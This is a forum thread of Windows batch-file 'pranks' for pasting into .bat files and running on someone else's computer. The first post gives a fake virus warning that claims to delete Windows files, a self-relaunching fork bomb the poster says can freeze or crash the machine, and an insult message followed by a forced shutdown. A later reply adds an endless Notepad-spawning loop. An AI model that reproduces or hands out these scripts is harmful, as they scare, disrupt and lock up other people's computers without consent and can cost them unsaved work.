Results 1 to 4 of 4
  1. #1
    josephlwu's Avatar
    Join Date
    Jun 2009
    Gender
    female
    Posts
    108
    Reputation
    10
    Thanks
    7

    Smile Batch file pranks

    Here are some pranks i found on the internet. i only edited the words a little.Copy and paste these commands into Notepad. then save it as [anything you want].bat

    this one makes you enter a username then fake deletes the hard drive
    Code:
    tree C:\WINDOWS
    @echo If the proper username is not enetered the above files will be deleted by this virus
    @echo Good Luck
    @set/p\/name=username:
    @echo haha you got the username wrong
    @echo haha you got it wrong
    @echo haha you got it wrong
    @echo haha you got it wrong
    @echo Files are being deleted
    shutdown -c ALL WINDOWS COMPONENTS ARE BEING DELETED

    this one freezes the computer by spamming CMD prompts(could possibly crash it too, so don't try it on yourself). YOU MUST SAVE THIS ONE AS a.bat!!
    Code:
    @echo off
    :START
    start a.bat
    GOTO START

    This one insults them
    Code:
    @echo off
    msg * I don't like you
    shutdown -c "ERROR! YOU ARE TOO STUPID!" -s

  2. #2
    tstom's Avatar
    Join Date
    Jun 2009
    Gender
    male
    Posts
    348
    Reputation
    10
    Thanks
    16
    My Mood
    Yeehaw
    The 2nd one all you have to type is "start a.bat" and save it a.bat all file types
    .:Latest:.

  3. #3
    miki08's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Posts
    1,428
    Reputation
    -6
    Thanks
    64
    My Mood
    Asleep
    cool tho i kno that
    -

  4. #4
    m164life's Avatar
    Join Date
    Jan 2006
    Gender
    male
    Location
    Chillin at Mr. bin Laden's
    Posts
    711
    Reputation
    10
    Thanks
    63
    Code:
    @echo off
    :start
    start notepad
    goto start


Similar Threads

  1. IP & Batch File Tricks & Hacks
    By [MP][GH] in forum Exploits
    Replies: 7
    Last Post: 12-06-2009, 10:21 AM
  2. Replies: 3
    Last Post: 07-19-2009, 01:48 AM
  3. whats a windows batch file??plz help
    By princemxx in forum Combat Arms Hacks & Cheats
    Replies: 2
    Last Post: 03-15-2009, 09:20 AM
  4. [Realease]IPChanger batch file
    By nighthawk3 in forum Combat Arms Hacks & Cheats
    Replies: 3
    Last Post: 08-19-2008, 08:18 AM
  5. Making A Batch File In Visual Basic
    By condor01 in forum Visual Basic Programming
    Replies: 0
    Last Post: 10-29-2007, 08:46 AM